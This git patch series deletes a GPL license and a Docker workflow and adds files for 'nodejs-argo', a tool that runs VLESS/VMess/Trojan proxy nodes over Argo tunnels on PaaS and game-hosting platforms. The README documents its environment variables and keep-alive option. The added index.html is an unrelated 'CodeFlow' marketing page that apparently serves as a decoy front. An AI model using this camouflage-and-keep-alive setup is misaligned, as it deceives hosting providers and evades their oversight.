-(1) assert copyright on the software, and (2) offer you this License -giving you legal permission to copy, distribute and/or modify it. - - For the developers' and authors' protection, the GPL clearly explains -that there is no warranty for this free software. For both users' and -authors' sake, the GPL requires that modified versions be marked as -changed, so that their problems will not be attributed erroneously to -authors of previous versions. - - Some devices are designed to deny users access to install or run -modified versions of the software inside them, although the manufacturer -can do so. This is fundamentally incompatible with the aim of -protecting users' freedom to change the software. The systematic -pattern of such abuse occurs in the area of products for individuals to -use, which is precisely where it is most unacceptable. Therefore, we -have designed this version of the GPL to prohibit the practice for those -products. If such problems arise substantially in other domains, we -stand ready to extend this provision to those domains in future versions -of the GPL, as needed to protect the freedom of users. - - Finally, every program is threatened constantly by software patents. -States should not allow patents to restrict development and use of -software on general-purpose computers, but in those that do, we wish to -avoid the special danger that patents applied to a free program could -make it effectively proprietary. To prevent this, the GPL assures that -patents cannot be used to render the program non-free. - - The precise terms and conditions for copying, distribution and -modification follow. - - TERMS AND CONDITIONS - - 0. Definitions. - - "This License" refers to version 3 of the GNU General Public License. - - "Copyright" also means copyright-like laws that apply to other kinds of -works, such as semiconductor masks. - - "The Program" refers to any copyrightable work licensed under this -License. Each licensee is addressed as "you". "Licensees" and -"recipients" may be individuals or organizations. - - To "modify" a work means to copy from or adapt all or part of the work -in a fashion requiring copyright permission, other than the making of an -exact copy. The resulting work is called a "modified version" of the -earlier work or a work "based on" the earlier work. - - A "covered work" means either the unmodified Program or a work based -on the Program. - - To "propagate" a work means to do anything with it that, without -permission, would make you directly or secondarily liable for -infringement under applicable copyright law, except executing it on a -computer or modifying a private copy. Propagation includes copying, -distribution (with or without modification), making available to the -public, and in some countries other activities as well. - - To "convey" a work means any kind of propagation that enables other -parties to make or receive copies. Mere interaction with a user through -a computer network, with no transfer of a copy, is not conveying. - - An interactive user interface displays "Appropriate Legal Notices" -to the extent that it includes a convenient and prominently visible -feature that (1) displays an appropriate copyright notice, and (2) -tells the user that there is no warranty for the work (except to the -extent that warranties are provided), that licensees may convey the -work under this License, and how to view a copy of this License. If -the interface presents a list of user commands or options, such as a -menu, a prominent item in the list meets this criterion. - - 1. Source Code. - - The "source code" for a work means the preferred form of the work -for making modifications to it. "Object code" means any non-source -form of a work. - - A "Standard Interface" means an interface that either is an official -standard defined by a recognized standards body, or, in the case of -interfaces specified for a particular programming language, one that -is widely used among developers working in that language. - - The "System Libraries" of an executable work include anything, other -than the work as a whole, that (a) is included in the normal form of -packaging a Major Component, but which is not part of that Major -Component, and (b) serves only to enable use of the work with that -Major Component, or to implement a Standard Interface for which an -implementation is available to the public in source code form. A -"Major Component", in this context, means a major essential component -(kernel, window system, and so on) of the specific operating system -(if any) on which the executable work runs, or a compiler used to -produce the work, or an object code interpreter used to run it. - - The "Corresponding Source" for a work in object code form means all -the source code needed to generate, install, and (for an executable -work) run the object code and to modify the work, including scripts to -control those activities. However, it does not include the work's -System Libraries, or general-purpose tools or generally available free -programs which are used unmodified in performing those activities but -which are not part of the work. For example, Corresponding Source -includes interface definition files associated with source files for -the work, and the source code for shared libraries and dynamically -linked subprograms that the work is specifically designed to require, -such as by intimate data communication or control flow between those -subprograms and other parts of the work. - - The Corresponding Source need not include anything that users -can regenerate automatically from other parts of the Corresponding -Source. - - The Corresponding Source for a work in source code form is that -same work. - - 2. Basic Permissions. - - All rights granted under this License are granted for the term of -copyright on the Program, and are irrevocable provided the stated -conditions are met. This License explicitly affirms your unlimited -permission to run the unmodified Program. The output from running a -covered work is covered by this License only if the output, given its -content, constitutes a covered work. This License acknowledges your -rights of fair use or other equivalent, as provided by copyright law. - - You may make, run and propagate covered works that you do not -convey, without conditions so long as your license otherwise remains -in force. You may convey covered works to others for the sole purpose -of having them make modifications exclusively for you, or provide you -with facilities for running those works, provided that you comply with -the terms of this License in conveying all material for which you do -not control copyright. Those thus making or running the covered works -for you must do so exclusively on your behalf, under your direction -and control, on terms that prohibit them from making any copies of -your copyrighted material outside their relationship with you. - - Conveying under any other circumstances is permitted solely under -the conditions stated below. Sublicensing is not allowed; section 10 -makes it unnecessary. - - 3. Protecting Users' Legal Rights From Anti-Circumvention Law. - - No covered work shall be deemed part of an effective technological -measure under any applicable law fulfilling obligations under article -11 of the WIPO copyright treaty adopted on 20 December 1996, or -similar laws prohibiting or restricting circumvention of such -measures. - - When you convey a covered work, you waive any legal power to forbid -circumvention of technological measures to the extent such circumvention -is effected by exercising rights under this License with respect to -the covered work, and you disclaim any intention to limit operation or -modification of the work as a means of enforcing, against the work's -users, your or third parties' legal rights to forbid circumvention of -technological measures. - - 4. Conveying Verbatim Copies. - - You may convey verbatim copies of the Program's source code as you -receive it, in any medium, provided that you conspicuously and -appropriately publish on each copy an appropriate copyright notice; -keep intact all notices stating that this License and any -non-permissive terms added in accord with section 7 apply to the code; -keep intact all notices of the absence of any warranty; and give all -recipients a copy of this License along with the Program. - - You may charge any price or no price for each copy that you convey, -and you may offer support or warranty protection for a fee. - - 5. Conveying Modified Source Versions. - - You may convey a work based on the Program, or the modifications to -produce it from the Program, in the form of source code under the -terms of section 4, provided that you also meet all of these conditions: - - a) The work must carry prominent notices stating that you modified - it, and giving a relevant date. - - b) The work must carry prominent notices stating that it is - released under this License and any conditions added under section - 7. This requirement modifies the requirement in section 4 to - "keep intact all notices". - - c) You must license the entire work, as a whole, under this - License to anyone who comes into possession of a copy. This - License will therefore apply, along with any applicable section 7 - additional terms, to the whole of the work, and all its parts, - regardless of how they are packaged. This License gives no - permission to license the work in any other way, but it does not - invalidate such permission if you have separately received it. - - d) If the work has interactive user interfaces, each must display - Appropriate Legal Notices; however, if the Program has interactive - interfaces that do not display Appropriate Legal Notices, your - work need not make them do so. - - A compilation of a covered work with other separate and independent -works, which are not by their nature extensions of the covered work, -and which are not combined with it such as to form a larger program, -in or on a volume of a storage or distribution medium, is called an -"aggregate" if the compilation and its resulting copyright are not -used to limit the access or legal rights of the compilation's users -beyond what the individual works permit. Inclusion of a covered work -in an aggregate does not cause this License to apply to the other -parts of the aggregate. - - 6. Conveying Non-Source Forms. - - You may convey a covered work in object code form under the terms -of sections 4 and 5, provided that you also convey the -machine-readable Corresponding Source under the terms of this License, -in one of these ways: - - a) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by the - Corresponding Source fixed on a durable physical medium - customarily used for software interchange. - - b) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by a - written offer, valid for at least three years and valid for as - long as you offer spare parts or customer support for that product - model, to give anyone who possesses the object code either (1) a - copy of the Corresponding Source for all the software in the - product that is covered by this License, on a durable physical - medium customarily used for software interchange, for a price no - more than your reasonable cost of physically performing this - conveying of source, or (2) access to copy the - Corresponding Source from a network server at no charge. - - c) Convey individual copies of the object code with a copy of the - written offer to provide the Corresponding Source. This - alternative is allowed only occasionally and noncommercially, and - only if you received the object code with such an offer, in accord - with subsection 6b. - - d) Convey the object code by offering access from a designated - place (gratis or for a charge), and offer equivalent access to the - Corresponding Source in the same way through the same place at no - further charge. You need not require recipients to copy the - Corresponding Source along with the object code. If the place to - copy the object code is a network server, the Corresponding Source - may be on a different server (operated by you or a third party) - that supports equivalent copying facilities, provided you maintain - clear directions next to the object code saying where to find the - Corresponding Source. Regardless of what server hosts the - Corresponding Source, you remain obligated to ensure that it is - available for as long as needed to satisfy these requirements. - - e) Convey the object code using peer-to-peer transmission, provided - you inform other peers where the object code and Corresponding - Source of the work are being offered to the general public at no - charge under subsection 6d. - - A separable portion of the object code, whose source code is excluded -from the Corresponding Source as a System Library, need not be -included in conveying the object code work. - - A "User Product" is either (1) a "consumer product", which means any -tangible personal property which is normally used for personal, family, -or household purposes, or (2) anything designed or sold for incorporation -into a dwelling. In determining whether a product is a consumer product, -doubtful cases shall be resolved in favor of coverage. For a particular -product received by a particular user, "normally used" refers to a -typical or common use of that class of product, regardless of the status -of the particular user or of the way in which the particular user -actually uses, or expects or is expected to use, the product. A product -is a consumer product regardless of whether the product has substantial -commercial, industrial or non-consumer uses, unless such uses represent -the only significant mode of use of the product. - - "Installation Information" for a User Product means any methods, -procedures, authorization keys, or other information required to install -and execute modified versions of a covered work in that User Product from -a modified version of its Corresponding Source. The information must -suffice to ensure that the continued functioning of the modified object -code is in no case prevented or interfered with solely because -modification has been made. - - If you convey an object code work under this section in, or with, or -specifically for use in, a User Product, and the conveying occurs as -part of a transaction in which the right of possession and use of the -User Product is transferred to the recipient in perpetuity or for a -fixed term (regardless of how the transaction is characterized), the -Corresponding Source conveyed under this section must be accompanied -by the Installation Information. But this requirement does not apply -if neither you nor any third party retains the ability to install -modified object code on the User Product (for example, the work has -been installed in ROM). - - The requirement to provide Installation Information does not include a -requirement to continue to provide support service, warranty, or updates -for a work that has been modified or installed by the recipient, or for -the User Product in which it has been modified or installed. Access to a -network may be denied when the modification itself materially and -adversely affects the operation of the network or violates the rules and -protocols for communication across the network. - - Corresponding Source conveyed, and Installation Information provided, -in accord with this section must be in a format that is publicly -documented (and with an implementation available to the public in -source code form), and must require no special password or key for -unpacking, reading or copying. - - 7. Additional Terms. - - "Additional permissions" are terms that supplement the terms of this -License by making exceptions from one or more of its conditions. -Additional permissions that are applicable to the entire Program shall -be treated as though they were included in this License, to the extent -that they are valid under applicable law. If additional permissions -apply only to part of the Program, that part may be used separately -under those permissions, but the entire Program remains governed by -this License without regard to the additional permissions. - - When you convey a copy of a covered work, you may at your option -remove any additional permissions from that copy, or from any part of -it. (Additional permissions may be written to require their own -removal in certain cases when you modify the work.) You may place -additional permissions on material, added by you to a covered work, -for which you have or can give appropriate copyright permission. - - Notwithstanding any other provision of this License, for material you -add to a covered work, you may (if authorized by the copyright holders of -that material) supplement the terms of this License with terms: - - a) Disclaiming warranty or limiting liability differently from the - terms of sections 15 and 16 of this License; or - - b) Requiring preservation of specified reasonable legal notices or - author attributions in that material or in the Appropriate Legal - Notices displayed by works containing it; or - - c) Prohibiting misrepresentation of the origin of that material, or - requiring that modified versions of such material be marked in - reasonable ways as different from the original version; or - - d) Limiting the use for publicity purposes of names of licensors or - authors of the material; or - - e) Declining to grant rights under trademark law for use of some - trade names, trademarks, or service marks; or - - f) Requiring indemnification of licensors and authors of that - material by anyone who conveys the material (or modified versions of - it) with contractual assumptions of liability to the recipient, for - any liability that these contractual assumptions directly impose on - those licensors and authors. - - All other non-permissive additional terms are considered "further -restrictions" within the meaning of section 10. If the Program as you -received it, or any part of it, contains a notice stating that it is -governed by this License along with a term that is a further -restriction, you may remove that term. If a license document contains -a further restriction but permits relicensing or conveying under this -License, you may add to a covered work material governed by the terms -of that license document, provided that the further restriction does -not survive such relicensing or conveying. - - If you add terms to a covered work in accord with this section, you -must place, in the relevant source files, a statement of the -additional terms that apply to those files, or a notice indicating -where to find the applicable terms. - - Additional terms, permissive or non-permissive, may be stated in the -form of a separately written license, or stated as exceptions; -the above requirements apply either way. - - 8. Termination. - - You may not propagate or modify a covered work except as expressly -provided under this License. Any attempt otherwise to propagate or -modify it is void, and will automatically terminate your rights under -this License (including any patent licenses granted under the third -paragraph of section 11). - - However, if you cease all violation of this License, then your -license from a particular copyright holder is reinstated (a) -provisionally, unless and until the copyright holder explicitly and -finally terminates your license, and (b) permanently, if the copyright -holder fails to notify you of the violation by some reasonable means -prior to 60 days after the cessation. - - Moreover, your license from a particular copyright holder is -reinstated permanently if the copyright holder notifies you of the -violation by some reasonable means, this is the first time you have -received notice of violation of this License (for any work) from that -copyright holder, and you cure the violation prior to 30 days after -your receipt of the notice. - - Termination of your rights under this section does not terminate the -licenses of parties who have received copies or rights from you under -this License. If your rights have been terminated and not permanently -reinstated, you do not qualify to receive new licenses for the same -material under section 10. - - 9. Acceptance Not Required for Having Copies. - - You are not required to accept this License in order to receive or -run a copy of the Program. Ancillary propagation of a covered work -occurring solely as a consequence of using peer-to-peer transmission -to receive a copy likewise does not require acceptance. However, -nothing other than this License grants you permission to propagate or -modify any covered work. These actions infringe copyright if you do -not accept this License. Therefore, by modifying or propagating a -covered work, you indicate your acceptance of this License to do so. - - 10. Automatic Licensing of Downstream Recipients. - - Each time you convey a covered work, the recipient automatically -receives a license from the original licensors, to run, modify and -propagate that work, subject to this License. You are not responsible -for enforcing compliance by third parties with this License. - - An "entity transaction" is a transaction transferring control of an -organization, or substantially all assets of one, or subdividing an -organization, or merging organizations. If propagation of a covered -work results from an entity transaction, each party to that -transaction who receives a copy of the work also receives whatever -licenses to the work the party's predecessor in interest had or could -give under the previous paragraph, plus a right to possession of the -Corresponding Source of the work from the predecessor in interest, if -the predecessor has it or can get it with reasonable efforts. - - You may not impose any further restrictions on the exercise of the -rights granted or affirmed under this License. For example, you may -not impose a license fee, royalty, or other charge for exercise of -rights granted under this License, and you may not initiate litigation -(including a cross-claim or counterclaim in a lawsuit) alleging that -any patent claim is infringed by making, using, selling, offering for -sale, or importing the Program or any portion of it. - - 11. Patents. - - A "contributor" is a copyright holder who authorizes use under this -License of the Program or a work on which the Program is based. The -work thus licensed is called the contributor's "contributor version". - - A contributor's "essential patent claims" are all patent claims -owned or controlled by the contributor, whether already acquired or -hereafter acquired, that would be infringed by some manner, permitted -by this License, of making, using, or selling its contributor version, -but do not include claims that would be infringed only as a -consequence of further modification of the contributor version. For -purposes of this definition, "control" includes the right to grant -patent sublicenses in a manner consistent with the requirements of -this License. - - Each contributor grants you a non-exclusive, worldwide, royalty-free -patent license under the contributor's essential patent claims, to -make, use, sell, offer for sale, import and otherwise run, modify and -propagate the contents of its contributor version. - - In the following three paragraphs, a "patent license" is any express -agreement or commitment, however denominated, not to enforce a patent -(such as an express permission to practice a patent or covenant not to -sue for patent infringement). To "grant" such a patent license to a -party means to make such an agreement or commitment not to enforce a -patent against the party. - - If you convey a covered work, knowingly relying on a patent license, -and the Corresponding Source of the work is not available for anyone -to copy, free of charge and under the terms of this License, through a -publicly available network server or other readily accessible means, -then you must either (1) cause the Corresponding Source to be so -available, or (2) arrange to deprive yourself of the benefit of the -patent license for this particular work, or (3) arrange, in a manner -consistent with the requirements of this License, to extend the patent -license to downstream recipients. "Knowingly relying" means you have -actual knowledge that, but for the patent license, your conveying the -covered work in a country, or your recipient's use of the covered work -in a country, would infringe one or more identifiable patents in that -country that you have reason to believe are valid. - - If, pursuant to or in connection with a single transaction or -arrangement, you convey, or propagate by procuring conveyance of, a -covered work, and grant a patent license to some of the parties -receiving the covered work authorizing them to use, propagate, modify -or convey a specific copy of the covered work, then the patent license -you grant is automatically extended to all recipients of the covered -work and works based on it. - - A patent license is "discriminatory" if it does not include within -the scope of its coverage, prohibits the exercise of, or is -conditioned on the non-exercise of one or more of the rights that are -specifically granted under this License. You may not convey a covered -work if you are a party to an arrangement with a third party that is -in the business of distributing software, under which you make payment -to the third party based on the extent of your activity of conveying -the work, and under which the third party grants, to any of the -parties who would receive the covered work from you, a discriminatory -patent license (a) in connection with copies of the covered work -conveyed by you (or copies made from those copies), or (b) primarily -for and in connection with specific products or compilations that -contain the covered work, unless you entered into that arrangement, -or that patent license was granted, prior to 28 March 2007. - - Nothing in this License shall be construed as excluding or limiting -any implied license or other defenses to infringement that may -otherwise be available to you under applicable patent law. - - 12. No Surrender of Others' Freedom. - - If conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot convey a -covered work so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you may -not convey it at all. For example, if you agree to terms that obligate you -to collect a royalty for further conveying from those to whom you convey -the Program, the only way you could satisfy both those terms and this -License would be to refrain entirely from conveying the Program. - - 13. Use with the GNU Affero General Public License. - - Notwithstanding any other provision of this License, you have -permission to link or combine any covered work with a work licensed -under version 3 of the GNU Affero General Public License into a single -combined work, and to convey the resulting work. The terms of this -License will continue to apply to the part which is the covered work, -but the special requirements of the GNU Affero General Public License, -section 13, concerning interaction through a network will apply to the -combination as such. - - 14. Revised Versions of this License. - - The Free Software Foundation may publish revised and/or new versions of -the GNU General Public License from time to time. Such new versions will -be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - - Each version is given a distinguishing version number. If the -Program specifies that a certain numbered version of the GNU General -Public License "or any later version" applies to it, you have the -option of following the terms and conditions either of that numbered -version or of any later version published by the Free Software -Foundation. If the Program does not specify a version number of the -GNU General Public License, you may choose any version ever published -by the Free Software Foundation. - - If the Program specifies that a proxy can decide which future -versions of the GNU General Public License can be used, that proxy's -public statement of acceptance of a version permanently authorizes you -to choose that version for the Program. - - Later license versions may give you additional or different -permissions. However, no additional obligations are imposed on any -author or copyright holder as a result of your choosing to follow a -later version. - - 15. Disclaimer of Warranty. - - THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY -APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT -HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY -OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, -THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR -PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM -IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF -ALL NECESSARY SERVICING, REPAIR OR CORRECTION. - - 16. Limitation of Liability. - - IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS -THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY -GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE -USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF -DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD -PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), -EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF -SUCH DAMAGES. - - 17. Interpretation of Sections 15 and 16. - - If the disclaimer of warranty and limitation of liability provided -above cannot be given local legal effect according to their terms, -reviewing courts shall apply local law that most closely approximates -an absolute waiver of all civil liability in connection with the -Program, unless a warranty or assumption of liability accompanies a -copy of the Program in return for a fee. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Programs - - If you develop a new program, and you want it to be of the greatest -possible use to the public, the best way to achieve this is to make it -free software which everyone can redistribute and change under these terms. - - To do so, attach the following notices to the program. It is safest -to attach them to the start of each source file to most effectively -state the exclusion of warranty; and each file should have at least -the "copyright" line and a pointer to where the full notice is found. - - - Copyright (C) - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - -Also add information on how to contact you by electronic and paper mail. - - If the program does terminal interaction, make it output a short -notice like this when it starts in an interactive mode: - - Copyright (C) - This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. - This is free software, and you are welcome to redistribute it - under certain conditions; type `show c' for details. - -The hypothetical commands `show w' and `show c' should show the appropriate -parts of the General Public License. Of course, your program's commands -might be different; for a GUI interface, you would use an "about box". - - You should also get your employer (if you work as a programmer) or school, -if any, to sign a "copyright disclaimer" for the program, if necessary. -For more information on this, and how to apply and follow the GNU GPL, see -. - - The GNU General Public License does not permit incorporating your program -into proprietary programs. If your program is a subroutine library, you -may consider it more useful to permit linking proprietary applications with -the library. If this is what you want to do, use the GNU Lesser General -Public License instead of this License. But first, please read -. From 7708e815397a8a96d2a40c51098544e178461426 Mon Sep 17 00:00:00 2001 From: hansc86 <49715253+hansc86@users.noreply.github.com> Date: Fri, 24 Apr 2026 20:52:02 +0800 Subject: [PATCH 09/19] Delete .github/workflows directory --- .github/workflows/build-docker-image.yml | 48 ------------------------ 1 file changed, 48 deletions(-) delete mode 100644 .github/workflows/build-docker-image.yml diff --git a/.github/workflows/build-docker-image.yml b/.github/workflows/build-docker-image.yml deleted file mode 100644 index 6be2fb67f7..0000000000 --- a/.github/workflows/build-docker-image.yml +++ /dev/null @@ -1,48 +0,0 @@ -name: Build and Push Docker Image - -on: - push: - branches: [ main ] - paths: - - 'Dockerfile' - - 'index.js' - - 'package.json' - pull_request: - branches: [ main ] - workflow_dispatch: - -jobs: - build: - runs-on: ubuntu-latest - permissions: - contents: read - packages: write - - steps: - - name: Checkout repository - uses: actions/checkout@v4 - - - name: Log in to GitHub Container Registry - uses: docker/login-action@v3 - with: - registry: ghcr.io - username: ${{ github.actor }} - password: ${{ secrets.GITHUB_TOKEN }} - - - name: Set up Docker Buildx - uses: docker/setup-buildx-action@v3 - - - name: Build and push Docker image - uses: docker/build-push-action@v5 - with: - context: . - push: true - platforms: linux/amd64,linux/arm64 - tags: | - ghcr.io/${{ github.repository_owner }}/zzzip:9982 - labels: | - org.opencontainers.image.source=https://github.com/${{ github.repository }} - org.opencontainers.image.description=HTTP Server - org.opencontainers.image.licenses=MIT - cache-from: type=gha - cache-to: type=gha,mode=max From 28352dad6b67b3276e5b20fabbd173f725381175 Mon Sep 17 00:00:00 2001 From: hansc86 <49715253+hansc86@users.noreply.github.com> Date: Sat, 20 Jun 2026 00:56:38 +0800 Subject: [PATCH 10/19] Add files via upload --- Dockerfile | 15 + README.md | 203 +++++++++++ index.html | 966 +++++++++++++++++++++++++++++++++++++++++++++++++++ index.js | 644 ++++++++++++++++++++++++++++++++++ package.json | 20 ++ 5 files changed, 1848 insertions(+) create mode 100644 Dockerfile create mode 100644 README.md create mode 100644 index.html create mode 100644 index.js create mode 100644 package.json diff --git a/Dockerfile b/Dockerfile new file mode 100644 index 0000000000..3b5e7bbc40 --- /dev/null +++ b/Dockerfile @@ -0,0 +1,15 @@ +FROM node:alpine3.22 + +WORKDIR /tmp + +COPY index.js index.html package.json ./ + +EXPOSE 3000/tcp + +RUN apk update && apk upgrade &&\ + apk add --no-cache openssl curl gcompat iproute2 coreutils &&\ + apk add --no-cache bash &&\ + chmod +x index.js &&\ + npm install + +CMD ["node", "index.js"] diff --git a/README.md b/README.md new file mode 100644 index 0000000000..866cc04531 --- /dev/null +++ b/README.md @@ -0,0 +1,203 @@ +
+

+ + nodejs-argo隧道代理 +

+ nodejs-argo是一个强大的Argo隧道部署工具,专为PaaS平台和游戏玩具平台设计。它支持多种代理协议(VLESS、VMess、Trojan等),并集成了哪吒探针功能。 + +--- + +Telegram交流反馈群组:https://t.me/eooceu +
+ +## 郑重声明 +* 本项目自2025年10月29日15时45分起,已更改开源协议,并包含以下特定要求 +* 此项目仅限个人使用,禁止用于商业行为(包括但不限于:youtube,bilibili,tiktok,facebook..等等) +* 禁止新建项目将代码复制到自己仓库中用做商业行为 +* 请遵守当地法律法规,禁止滥用做公共代理行为 +* 如有违反以上条款者将追究法律责任 + +## 说明 (部署前请仔细阅读) + +* 本项目是针对node环境的paas平台和游戏玩具而生,采用Argo隧道部署节点,集成哪吒探针v0或v1可选。 +* node玩具平台只需上传index.js和package.json即可,paas平台需要docker部署的才上传Dockerfile。 +* 不填写ARGO_DOMAIN和ARGO_AUTH两个变量即启用临时隧道,反之则使用固定隧道。 +* 哪吒v0/v1可选,当哪吒端口为{443,8443,2096,2087,2083,2053}其中之一时,自动开启tls。 + +## 📋 环境变量 + +| 变量名 | 是否必须 | 默认值 | 说明 | +|--------|----------|--------|------| +| UPLOAD_URL | 否 | - | 订阅上传地址 | +| PROJECT_URL | 否 | https://www.google.com | 项目分配的域名 | +| AUTO_ACCESS | 否 | false | 是否开启自动访问保活 | +| PORT | 否 | 3000 | HTTP服务监听端口 | +| ARGO_PORT | 否 | 8001 | Argo隧道端口 | +| UUID | 否 | 89c13786-25aa-4520-b2e7-12cd60fb5202 | 用户UUID | +| NEZHA_SERVER | 否 | - | 哪吒面板域名 | +| NEZHA_PORT | 否 | - | 哪吒端口 | +| NEZHA_KEY | 否 | - | 哪吒密钥 | +| ARGO_DOMAIN | 否 | - | Argo固定隧道域名 | +| ARGO_AUTH | 否 | - | Argo固定隧道密钥 | +| CFIP | 否 | www.visa.com.tw | 节点优选域名或IP | +| CFPORT | 否 | 443 | 节点端口 | +| NAME | 否 | Vls | 节点名称前缀 | +| FILE_PATH | 否 | ./tmp | 运行目录 | +| SUB_PATH | 否 | sub | 订阅路径 | + +## 🌐 订阅地址 + +- 标准端口:`https://your-domain.com/sub` +- 非标端口:`http://your-domain.com:port/sub` + +--- + +## 🚀 进阶使用 + +### 安装 + +```bash +# 全局安装(推荐) +npm install -g nodejs-argo + +# 或者使用yarn +yarn global add nodejs-argo + +# 或者使用pnpm +pnpm add -g nodejs-argo +``` + +### 基本使用 + +```bash +# 直接运行(使用默认配置) +nodejs-argo + +# 使用npx运行 +npx nodejs-argo + +# 设置环境变量运行 + PORT=3000 npx nodejs-argo +``` + +### 环境变量配置 + +可使用 `.env` 文件来配置环境变量运行 + + +或者直接在命令行中设置: + +```bash +export UPLOAD_URL="https://your-merge-sub-domain.com" +export PROJECT_URL="https://your-project-domain.com" +export PORT=3000 +export UUID="your-uuid-here" +export NEZHA_SERVER="nz.your-domain.com:8008" +export NEZHA_KEY="your-nezha-key" +``` + +## 📦 作为npm模块使用 + +```javascript +// CommonJS +const nodejsArgo = require('nodejs-argo'); + +// ES6 Modules +import nodejsArgo from 'nodejs-argo'; + +// 启动服务 +nodejsArgo.start(); +``` + +## 🔧 后台运行 + +### 使用screen(推荐) +```bash +# 创建screen会话 +screen -S argo + +# 运行应用 +nodejs-argo + +# 按 Ctrl+A 然后按 D 分离会话 +# 重新连接:screen -r argo +``` + +### 使用tmux +```bash +# 创建tmux会话 +tmux new-session -d -s argo + +# 运行应用 +tmux send-keys -t argo "nodejs-argo" Enter + +# 分离会话:tmux detach -s argo +# 重新连接:tmux attach -t argo +``` + +### 使用PM2 +```bash +# 安装PM2 +npm install -g pm2 + +# 启动应用 +pm2 start nodejs-argo --name "argo-service" + +# 管理应用 +pm2 status +pm2 logs argo-service +pm2 restart argo-service +``` + +### 使用systemd(Linux系统服务) +```bash +# 创建服务文件 +sudo nano /etc/systemd/system/nodejs-argo.service + +``` +[Unit] +Description=Node.js Argo Service +After=network.target + +[Service] +Type=simple +User=root +WorkingDirectory=/root/test +Environment=ARGO_PORT=8080 +Environment=PORT=3000 +ExecStart=/usr/bin/npx nodejs-argo +Restart=always +RestartSec=10 + +[Install] +WantedBy=multi-user.target +``` + +# 启动服务 +sudo systemctl start nodejs-argo +sudo systemctl enable nodejs-argo +``` + +## 🔄 更新 + +```bash +# 更新全局安装的包 +npm update -g nodejs-argo + +# 或者重新安装 +npm uninstall -g nodejs-argo +npm install -g nodejs-argo +``` + +## 📚 更多信息 + +- [GitHub仓库](https://github.com/eooce/nodejs-argo) +- [npm包页面](https://www.npmjs.com/package/nodejs-argo) +- [问题反馈](https://github.com/eooce/nodejs-argo/issues) + +--- + +## 赞助 +* 感谢[VPS.Town](https://vps.town)提供赞助 https://vps.town + +* 感谢[ZMTO](https://zmto.com/?affid=1548)提供赞助优质双isp vps。 diff --git a/index.html b/index.html new file mode 100644 index 0000000000..bf0df56a12 --- /dev/null +++ b/index.html @@ -0,0 +1,966 @@ + + + + + + CodeFlow | Visual Development Platform + + + + + + +
+
+ +
+
+ + +
+
+
+
+

Build Apps Faster With Visual Development

+

CodeFlow empowers teams to create enterprise-grade applications with minimal coding. Drag, drop, and connect components to build powerful web and mobile apps in record time.

+
+ + +
+
+
+ CodeFlow Platform Interface +
+
+
+
+ + +
+
+
+

Powerful Features for Rapid Development

+

CodeFlow provides all the tools you need to build, deploy, and scale applications without writing extensive code.

+
+ +
+
+
+ +
+

Visual Builder

+

Drag and drop UI components to design responsive interfaces. Connect data sources with simple point-and-click actions.

+
+ +
+
+ +
+

Database Integration

+

Connect to any data source with built-in connectors. Automatically generate CRUD operations without writing SQL.

+
+ +
+
+ +
+

Cross-Platform

+

Build once, deploy everywhere. Generate applications for web, iOS, and Android from a single visual design.

+
+ +
+
+ +
+

Extensible with Code

+

Add custom functionality with JavaScript when needed. Our platform doesn't limit your creativity or complexity.

+
+ +
+
+ +
+

Enterprise Security

+

Built-in authentication, authorization, and data encryption. SOC2 compliant with enterprise-grade security features.

+
+ +
+
+ +
+

One-Click Deployment

+

Deploy to cloud or on-premises with a single click. Automatic scaling and monitoring included.

+
+
+
+
+ + +
+
+
+

Why Choose CodeFlow?

+

Join thousands of companies accelerating their digital transformation with low-code development.

+
+ +
+
+
+ +
+

10x Faster Development

+

Build applications in days instead of months with visual development tools.

+
+ +
+
+ +
+

Reduce Costs by 70%

+

Lower development and maintenance costs with fewer resources required.

+
+ +
+
+ +
+

Citizen Developers

+

Enable business users to build solutions with minimal IT assistance.

+
+ +
+
+ +
+

Scale Effortlessly

+

From prototype to enterprise-scale applications with the same platform.

+
+
+
+
+ + +
+
+
+

Trusted by Industry Leaders

+

See what our customers have to say about their experience with CodeFlow.

+
+ +
+
+
+ "CodeFlow transformed how we deliver solutions to our business units. What used to take 6 months now takes 3 weeks. Our development team can focus on complex problems while business teams build their own solutions." +
+
+
SC
+
+

Sarah Chen

+

CTO, TechGrowth Inc.

+
+
+
+
+
+
+ + +
+
+
+

Simple, Transparent Pricing

+

Choose the plan that fits your needs. All plans include core features with no hidden fees.

+
+ +
+
+

Starter

+
$29/month
+
    +
  • Up to 5 users
  • +
  • 10 GB storage
